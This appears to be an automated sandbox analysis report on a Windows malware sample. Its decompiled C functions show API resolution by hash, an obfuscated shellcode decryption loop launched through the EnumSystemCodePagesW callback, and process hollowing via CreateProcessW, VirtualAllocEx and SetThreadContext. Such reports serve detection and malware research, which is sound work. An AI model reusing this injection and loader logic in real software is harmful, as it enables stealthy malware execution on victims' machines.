                                                                                            • SetErrorMode.KERNEL32(00008003,?,?,01057C93,?), ref: 0105D46B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                            • Instruction ID: d33f14a2d648c1960b73ea38d9f18717ebbf3691ea15f66cb3c53a870fadb6a0
                                                                                            • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                            • Instruction Fuzzy Hash: 1BD05E617503082BE610AAA89C03F6636CC6B55A00F494064FA899B3C3D950E4008561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0105D471, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008003,?,?,01057C93,?), ref: 0105D46B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 9e3fc118669a17d3c445cb3b268d018a17f286440db85f43189f5c285810d127
                                                                                            • Instruction ID: c7638be8023b54fdd91f7214f3d127581d7a40c02e0b5ac954ff6cc2e041bac3
                                                                                            • Opcode Fuzzy Hash: 9e3fc118669a17d3c445cb3b268d018a17f286440db85f43189f5c285810d127
                                                                                            • Instruction Fuzzy Hash: 64B0222202C3200CF383E3F03C02CCB3E82B20322CB0282CBE0CEA2803C80000808F80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0537967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ab03b6edf56b23f08400c77d2d672451653759ff28660063cce054af49f8095f
                                                                                            • Instruction ID: 3b3a604949ab1cf10b202f071e780de97d7558b7d78998b1f011b7616ff78ba4
                                                                                            • Opcode Fuzzy Hash: ab03b6edf56b23f08400c77d2d672451653759ff28660063cce054af49f8095f
                                                                                            • Instruction Fuzzy Hash: F4B09B72D015C5C5DA15E7604608F37791177D0751F56C561D1060645A477CC091F5B5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 053CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E053CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0537CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E053C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E053C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                            0x053cfdda
                                                                                            0x053cfde2
                                                                                            0x053cfde5
                                                                                            0x053cfdec
                                                                                            0x053cfdfa
                                                                                            0x053cfdff
                                                                                            0x053cfe0a
                                                                                            0x053cfe0f
                                                                                            0x053cfe17
                                                                                            0x053cfe1e
                                                                                            0x053cfe19
                                                                                            0x053cfe19
                                                                                            0x053cfe19
                                                                                            0x053cfe20
                                                                                            0x053cfe21
                                                                                            0x053cfe22
                                                                                            0x053cfe25
                                                                                            0x053cfe40

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053CFDFA
                                                                                            Strings
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 053CFE2B
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 053CFE01
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                            • API String ID: 885266447-3903918235
                                                                                            • Opcode ID: f5d70027ae87d872ffa95f59340f8c4e14fc0ccfef2ae594e88e4a4408713beb
                                                                                            • Instruction ID: 3521fa86396498f5ce63553c40aa42762e84b9076cc3d69897c844b0393b5bf9
                                                                                            • Opcode Fuzzy Hash: f5d70027ae87d872ffa95f59340f8c4e14fc0ccfef2ae594e88e4a4408713beb
                                                                                            • Instruction Fuzzy Hash: 8AF02B36640601BFD6201A55DC0AF23BF5BEB45730F244358F628965E1DA62FC7097F0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Analysis Process: 5jsdph8p9l_r.exe PID: 7056 Parent PID: 3352 5jsdph8p9l_r.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 702B5572, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E702B5572(void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				char _v60;
				short _t60;
				short _t61;
				short _t62;
				void* _t78;
				void* _t79;
				void _t81;
				long _t86;
				void* _t91;
				void* _t95;
				void* _t100;
				void* _t102;
				short _t103;
				short _t120;
				signed int _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t141;
				void* _t142;

				_t142 = __eflags;
				_t60 = 0x6e;
				_v60 = _t60;
				_t100 = 0;
				_t61 = 0x74;
				_t103 = 0x64;
				_t120 = 0x6c;
				_v58 = _t61;
				_t62 = 0x2e;
				_v50 = _t62;
				_v56 = _t103;
				_v54 = _t120;
				_v52 = _t120;
				_v48 = _t103;
				_v46 = _t120;
				_v44 = _t120;
				_v42 = 0;
				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				E702B58E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fe63623);
				_v16 = E702B58E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fbd727f);
				_v12 = E702B58E6(_t137, 0x7fb47add);
				_v32 = E702B58E6(_t137, 0x7fe7f840);
				_v24 = E702B58E6(_t137, 0x7fe1f1fb);
				_v28 = E702B58E6(_t137, 0x7f951704);
				_v36 = E702B58E6(_t137, 0x7f91a078);
				_t78 = CreateFileW(E702B58B4( &_v60, _t142), 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_t138 = _t78;
				_v20 = _t138;
				if(_t138 == 0xffffffff) {
					L13:
					_t139 = _t100;
					L14:
					_t79 = _v20;
					__eflags = _t79;
					if(_t79 != 0) {
						_v24(_t79);
					}
					_v36(0);
					L22:
					while( *_t100 != 0xb8) {
						_t81 =  *_t100;
						__eflags = _t81 - 0xe9;
						if(_t81 != 0xe9) {
							__eflags = _t81 - 0xea;
							if(_t81 != 0xea) {
								_t100 = _t100 + 1;
								__eflags = _t100;
							} else {
								_t100 =  *(_t100 + 1);
							}
						} else {
							_t100 = _t100 + 5 +  *(_t100 + 1);
						}
					}
					_t135 =  *(_t100 + 1);
					if(_t139 != 0) {
						VirtualFree(_t139, 0, 0x8000);
					}
					return _t135;
				}
				_t86 = _v16(_t138, 0);
				_v16 = _t86;
				if(_t86 == 0xffffffff) {
					goto L13;
				}
				_t136 = VirtualAlloc(0, _t86, 0x3000, 4);
				if(_t136 == 0 || ReadFile(_t138, _t136, _v16,  &_v40, 0) == 0) {
					goto L13;
				} else {
					_t141 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
					_v32 =  *(_t141 + 0x14) & 0x0000ffff;
					_t91 = VirtualAlloc(0,  *(_t141 + 0x50), 0x3000, 4);
					_v8 = _t91;
					if(_t91 == 0) {
						_t139 = _t91;
						goto L14;
					}
					E702B584B(_t91, _t136,  *((intOrPtr*)(_t141 + 0x54)));
					_v12 = _v12 & 0;
					if(0 >=  *(_t141 + 6)) {
						L8:
						_t139 = _v8;
						_t100 = E702B58E6(_t139, _a4);
						if(_t100 == 0) {
							goto L14;
						}
						_t95 = _v20;
						if(_t95 != 0) {
							FindCloseChangeNotification(_t95);
						}
						VirtualFree(_t136, 0, 0x8000);
						goto L22;
					} else {
						_t102 = _v8;
						_t116 = _v32 + 0x2c + _t141;
						_v16 = _v32 + 0x2c + _t141;
						do {
							E702B584B( *((intOrPtr*)(_t116 - 8)) + _t102,  *_t116 + _t136,  *((intOrPtr*)(_t116 - 4)));
							_t133 = _v12 + 1;
							_t116 = _v16 + 0x28;
							_v12 = _t133;
							_v16 = _v16 + 0x28;
						} while (_t133 < ( *(_t141 + 6) & 0x0000ffff));
						goto L8;
					}
				}
			}










































                                                                                            0x702b5572
                                                                                            0x702b557d
                                                                                            0x702b5580
                                                                                            0x702b5584
                                                                                            0x702b5586
                                                                                            0x702b5589
                                                                                            0x702b558c
                                                                                            0x702b558d
                                                                                            0x702b5593
                                                                                            0x702b5594
                                                                                            0x702b559a
                                                                                            0x702b559e
                                                                                            0x702b55a2
                                                                                            0x702b55a6
                                                                                            0x702b55aa
                                                                                            0x702b55ae
                                                                                            0x702b55b2
                                                                                            0x702b55c9
                                                                                            0x702b55d2
                                                                                            0x702b55ea
                                                                                            0x702b55f9
                                                                                            0x702b5608
                                                                                            0x702b5617
                                                                                            0x702b5626
                                                                                            0x702b5643
                                                                                            0x702b564c
                                                                                            0x702b564e
                                                                                            0x702b5650
                                                                                            0x702b5656
                                                                                            0x702b5736
                                                                                            0x702b5736
                                                                                            0x702b5738
                                                                                            0x702b5738
                                                                                            0x702b573b
                                                                                            0x702b573d
                                                                                            0x702b5740
                                                                                            0x702b5740
                                                                                            0x702b5745
                                                                                            0x00000000
                                                                                            0x702b5764
                                                                                            0x702b574a
                                                                                            0x702b574c
                                                                                            0x702b574e
                                                                                            0x702b575a
                                                                                            0x702b575c
                                                                                            0x702b5763
                                                                                            0x702b5763
                                                                                            0x702b575e
                                                                                            0x702b575e
                                                                                            0x702b575e
                                                                                            0x702b5750
                                                                                            0x702b5756
                                                                                            0x702b5756
                                                                                            0x702b574e
                                                                                            0x702b5769
                                                                                            0x702b576e
                                                                                            0x702b5778
                                                                                            0x702b5778
                                                                                            0x702b5783
                                                                                            0x702b5783
                                                                                            0x702b565e
                                                                                            0x702b5661
                                                                                            0x702b5667
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x702b5679
                                                                                            0x702b567d
                                                                                            0x00000000
                                                                                            0x702b5698
                                                                                            0x702b569d
                                                                                            0x702b56ac
                                                                                            0x702b56af
                                                                                            0x702b56b2
                                                                                            0x702b56b7
                                                                                            0x702b5732
                                                                                            0x00000000
                                                                                            0x702b5732
                                                                                            0x702b56c0
                                                                                            0x702b56c5
                                                                                            0x702b56ce
                                                                                            0x702b5707
                                                                                            0x702b5707
                                                                                            0x702b5714
                                                                                            0x702b5718
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x702b571a
                                                                                            0x702b571f
                                                                                            0x702b5722
                                                                                            0x702b5722
                                                                                            0x702b572d
                                                                                            0x00000000
                                                                                            0x702b56d0
                                                                                            0x702b56d3
                                                                                            0x702b56d9
                                                                                            0x702b56db
                                                                                            0x702b56de
                                                                                            0x702b56ea
                                                                                            0x702b56f5
                                                                                            0x702b56fa
                                                                                            0x702b56fd
                                                                                            0x702b5700
                                                                                            0x702b5703
                                                                                            0x00000000
                                                                                            0x702b56de
                                                                                            0x702b56ce

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,?,?), ref: 702B564C
                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,702B52FA,7FC6FA16,702B54B9), ref: 702B5676
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,702B52FA,7FC6FA16), ref: 702B568D
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,702B52FA,7FC6FA16,702B54B9), ref: 702B56AF
                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,702B52FA,7FC6FA16,702B54B9,00000000,00000000), ref: 702B5722
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,702B52FA,7FC6FA16,702B54B9), ref: 702B572D
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,702B52FA,7FC6FA16,702B54B9,00000000), ref: 702B5778
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                            • String ID:
                                                                                            • API String ID: 656311269-0
                                                                                            • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                            • Instruction ID: eb79e2041047be76601a5e4a87f3b352bb6deea23ee3a7ac069bbe7f85e8b5f0
                                                                                            • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                            • Instruction Fuzzy Hash: 4E618436F00315ABCB10DFA4D980BAEF7B9AF48650F248059E506EF290EA789D52DB54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 702B2170, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E702B2170() {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				void* _t120;

				_v16 = _v16 & 0x00000000;
				_t120 = RtlAllocateHeap(GetProcessHeap(), 1, 0xbebc200); // executed
				_v16 = _t120;
				if(_v16 != 0) {
					memset(_v16, 0xde, 0xbebc200);
					_v12 = _v12 & 0x00000000;
					_v12 = _v12 & 0x00000000;
					while(_v12 < 0x147d) {
						_t14 = E702B5170 + _v12; // 0x28000000
						_v5 =  *_t14;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ 0x000000a4;
						_v5 = (_v5 & 0x000000ff) + 0xad;
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 = (_v5 & 0x000000ff) - 0xa3;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0xec;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + 0xf1;
						_v5 = _v5 & 0x000000ff ^ 0x0000001e;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ 0x00000033;
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = (_v5 & 0x000000ff) - 0xc5;
						_v5 = _v5 & 0x000000ff ^ 0x0000009b;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + 0x8a;
						_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
						_v5 = (_v5 & 0x000000ff) + 0xe1;
						_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
						_v5 = (_v5 & 0x000000ff) - _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 = (_v5 & 0x000000ff) + _v12;
						 *((char*)(E702B5170 + _v12)) = _v5;
						_v12 = _v12 + 1;
					}
					EnumSystemCodePagesW(E702B5170, 0); // executed
				}
				return 0;
			}







                                                                                            0x702b2176
                                                                                            0x702b2188
                                                                                            0x702b218e
                                                                                            0x702b2195
                                                                                            0x702b21a8
                                                                                            0x702b21b0
                                                                                            0x702b21b4
                                                                                            0x702b21c1
                                                                                            0x702b21d1
                                                                                            0x702b21d7
                                                                                            0x702b21e1
                                                                                            0x702b21ed
                                                                                            0x702b21f9
                                                                                            0x702b220c
                                                                                            0x702b2218
                                                                                            0x702b2221
                                                                                            0x702b2233
                                                                                            0x702b223c
                                                                                            0x702b2248
                                                                                            0x702b2251
                                                                                            0x702b2264
                                                                                            0x702b226e
                                                                                            0x702b2278
                                                                                            0x702b2281
                                                                                            0x702b228b
                                                                                            0x702b2294
                                                                                            0x702b22a7
                                                                                            0x702b22b0
                                                                                            0x702b22ba
                                                                                            0x702b22c6
                                                                                            0x702b22d0
                                                                                            0x702b22da
                                                                                            0x702b22e4
                                                                                            0x702b22f7
                                                                                            0x702b2303
                                                                                            0x702b230f
                                                                                            0x702b2318
                                                                                            0x702b2322
                                                                                            0x702b2334
                                                                                            0x702b233e
                                                                                            0x702b2347
                                                                                            0x702b235a
                                                                                            0x702b2363
                                                                                            0x702b236f
                                                                                            0x702b2382
                                                                                            0x702b238e
                                                                                            0x702b23a0
                                                                                            0x702b23aa
                                                                                            0x702b23b4
                                                                                            0x702b23be
                                                                                            0x702b23c7
                                                                                            0x702b21be
                                                                                            0x702b21be
                                                                                            0x702b23d9
                                                                                            0x702b23d9
                                                                                            0x702b23e4

                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(00000001,0BEBC200), ref: 702B2181
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 702B2188
                                                                                            • memset.MSVCRT ref: 702B21A8
                                                                                            • EnumSystemCodePagesW.KERNELBASE(702B5170,00000000), ref: 702B23D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.755132588.00000000702B1000.00000020.00020000.sdmp, Offset: 702B0000, based on PE: true
                                                                                            • Associated: 00000025.00000002.755122802.00000000702B0000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755141853.00000000702B4000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755149606.00000000702B5000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000025.00000002.755157743.00000000702B7000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocateCodeEnumPagesProcessSystemmemset
                                                                                            • String ID: pFt
                                                                                            • API String ID: 3396865476-726567960
                                                                                            • Opcode ID: 570e162bea70813cbf03eafc9a646598576a905e428415071b53e1a500d4023d
                                                                                            • Instruction ID: 32678b6c3916382a99ad3335644d9887c32e5eaf118c548c1c2fa0456374fcda
                                                                                            • Opcode Fuzzy Hash: 570e162bea70813cbf03eafc9a646598576a905e428415071b53e1a500d4023d
                                                                                            • Instruction Fuzzy Hash: B6816761C5D2E8BDDB06CBED84647FCBFB05E26102F0841CAE4E5A5283C17A935EDB25
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 702B6323, Relevance: 7.7, APIs: 5, Instructions: 237processthreadCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 29%
                                                                                            			E702B6323(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void* _v20;
				char* _v24;
				intOrPtr _v28;
				char* _v32;
				intOrPtr _v36;
				void _v40;
				intOrPtr _v44;
				struct _PROCESS_INFORMATION _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				struct _STARTUPINFOW _v160;
				struct _CONTEXT _v876;
				short _v1916;
				void* _t155;
				void* _t161;
				intOrPtr _t162;
				void* _t165;
				signed int _t175;
				void* _t186;

				_v12 = E702B5837();
				_v68 = E702B58E6(_v12, 0xff7f721a);
				_v76 = E702B58E6(_v12, 0x7fe2736c);
				_v80 = E702B58E6(_v12, 0x7fa1f993);
				_v84 = E702B58E6(_v12, 0x7fa3ef6e);
				_v92 = E702B58E6(_v12, 0xff31bf16);
				_v72 = E702B58E6(_v12, 0x7fb6c905);
				_t228 = 0x7fb1f910;
				_v88 = E702B58E6(_v12, 0x7fb1f910);
				_v64 = _a4;
				_v8 = _a4 +  *((intOrPtr*)(_v64 + 0x3c));
				_t26 = ( *(_v8 + 0x14) & 0x0000ffff) + 0x18; // 0x18
				_v44 = _v8 + _t26;
				_v28 = 0x10;
				_v24 =  &_v60;
				while(_v28 != 0) {
					 *_v24 = 0;
					_v24 = _v24 + 1;
					_v28 = _v28 - 1;
				}
				_v36 = 0x44;
				_v32 =  &_v160;
				while(_v36 != 0) {
					 *_v32 = 0;
					_v32 = _v32 + 1;
					_v36 = _v36 - 1;
				}
				_v20 =  *(_v8 + 0x34);
				_push(0x103);
				_push( &_v1916);
				_push(0);
				if(_v68() != 0) {
					if(CreateProcessW( &_v1916, _v72(), 0, 0, 0, 0x8000004, 0, 0,  &_v160,  &_v60) != 0) {
						_v876.ContextFlags = 0x10007;
						if(GetThreadContext(_v60.hThread,  &_v876) != 0) {
							if(ReadProcessMemory(_v60.hProcess, _v876.Ebx + 8,  &_v40, 4, 0) != 0) {
								_t217 = _v40;
								if(_v40 <  *(_v8 + 0x34)) {
									L18:
									_v20 = VirtualAllocEx(_v60.hProcess,  *(_v8 + 0x34),  *(_v8 + 0x50), 0x3000, 0x40);
									if(_v20 != 0) {
										_push(0);
										_push( *((intOrPtr*)(_v8 + 0x54)));
										_push(_a4);
										_push(_v20);
										_push(_v60.hProcess);
										_t155 = E702B53D7(_t217, _t228); // executed
										if(_t155 != 0) {
											_v16 = _v16 & 0x00000000;
											while(_v16 < ( *(_v8 + 6) & 0x0000ffff)) {
												_push(0);
												_push( *((intOrPtr*)(_v44 + 0x10 + _v16 * 0x28)));
												_push(_a4 +  *((intOrPtr*)(_v44 + 0x14 + _v16 * 0x28)));
												_t175 = _v16 * 0x28;
												_t217 = _v44;
												_t228 = _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc));
												_push(_v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc)));
												_push(_v60.hProcess);
												E702B53D7(_t217, _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc))); // executed
												_v16 = _v16 + 1;
											}
											_push(0);
											_push(4);
											_push( &_v20);
											_push(_v876.Ebx + 8);
											_push(_v60.hProcess);
											_t161 = E702B53D7(_t217, _t228); // executed
											if(_t161 != 0) {
												_t162 = _v8;
												_t219 = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												_v876.Eax = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												if(SetThreadContext(_v60.hThread,  &_v876) != 0) {
													_t165 = E702B5326(_t219, _t228, _v60.hThread); // executed
													if(_t165 != 0) {
														return 0;
													}
													return 1;
												}
												return 1;
											}
											return 1;
										}
										return 1;
									}
									return 1;
								}
								_t217 = _v8;
								if(_v40 >  *(_v8 + 0x34) +  *(_v8 + 0x50)) {
									goto L18;
								}
								_t186 = E702B54D8(_t217, _t228, _v60, _v40); // executed
								if(_t186 == 0) {
									goto L18;
								}
								return 1;
							}
							return 1;
						}
						return 1;
					}
					return 1;
				}
				return 1;
			}































                                                                                            0x702b6331
                                                                                            0x702b6341
                                                                                            0x702b6351
                                                                                            0x702b6361
                                                                                            0x702b6371
                                                                                            0x702b6381
                                                                                            0x702b6391
                                                                                            0x702b6394
                                                                                            0x702b63a1
                                                                                            0x702b63a7
                                                                                            0x702b63b3
                                                                                            0x702b63c0
                                                                                            0x702b63c4
                                                                                            0x702b63c7
                                                                                            0x702b63d1
                                                                                            0x702b63d4
                                                                                            0x702b63dd
                                                                                            0x702b63e4
                                                                                            0x702b63eb
                                                                                            0x702b63eb
                                                                                            0x702b63f0
                                                                                            0x702b63fd
                                                                                            0x702b6400
                                                                                            0x702b6409
                                                                                            0x702b6410
                                                                                            0x702b6417
                                                                                            0x702b6417
                                                                                            0x702b6422
                                                                                            0x702b6425
                                                                                            0x702b6430
                                                                                            0x702b6431
                                                                                            0x702b6438
                                                                                            0x702b646c
                                                                                            0x702b6476
                                                                                            0x702b648f
                                                                                            0x702b64b3
                                                                                            0x702b64c0
                                                                                            0x702b64c6
                                                                                            0x702b64f0
                                                                                            0x702b6509
                                                                                            0x702b6510
                                                                                            0x702b651a
                                                                                            0x702b651f
                                                                                            0x702b6522
                                                                                            0x702b6525
                                                                                            0x702b6528
                                                                                            0x702b652b
                                                                                            0x702b6532
                                                                                            0x702b653c
                                                                                            0x702b6549
                                                                                            0x702b6555
                                                                                            0x702b655e
                                                                                            0x702b6570
                                                                                            0x702b6571
                                                                                            0x702b6575
                                                                                            0x702b657b
                                                                                            0x702b657f
                                                                                            0x702b6580
                                                                                            0x702b6583
                                                                                            0x702b6546
                                                                                            0x702b6546
                                                                                            0x702b658a
                                                                                            0x702b658c
                                                                                            0x702b6591
                                                                                            0x702b659b
                                                                                            0x702b659c
                                                                                            0x702b659f
                                                                                            0x702b65a6
                                                                                            0x702b65ad
                                                                                            0x702b65b3
                                                                                            0x702b65b6
                                                                                            0x702b65cb
                                                                                            0x702b65d5
                                                                                            0x702b65dc
                                                                                            0x00000000
                                                                                            0x702b65e3
                                                                                            0x00000000
                                                                                            0x702b65e0
                                                                                            0x00000000
                                                                                            0x702b65cf
                                                                                            0x00000000
                                                                                            0x702b65aa
                                                                                            0x00000000
                                                                                            0x702b6536
                                                                                            0x00000000
                                                                                            0x702b6514
                                                                                            0x702b64ce
                                                                                            0x702b64d7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x702b64df
                                                                                            0x702b64e6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x702b64ea
                                                                                            0x00000000
                                                                                            0x702b64b7
                                                                                            0x00000000
                                                                                            0x702b6493
                                                                                            0x00000000
                                                                                            0x702b6470
                                                                                            0x00000000

                                                                                            APIs
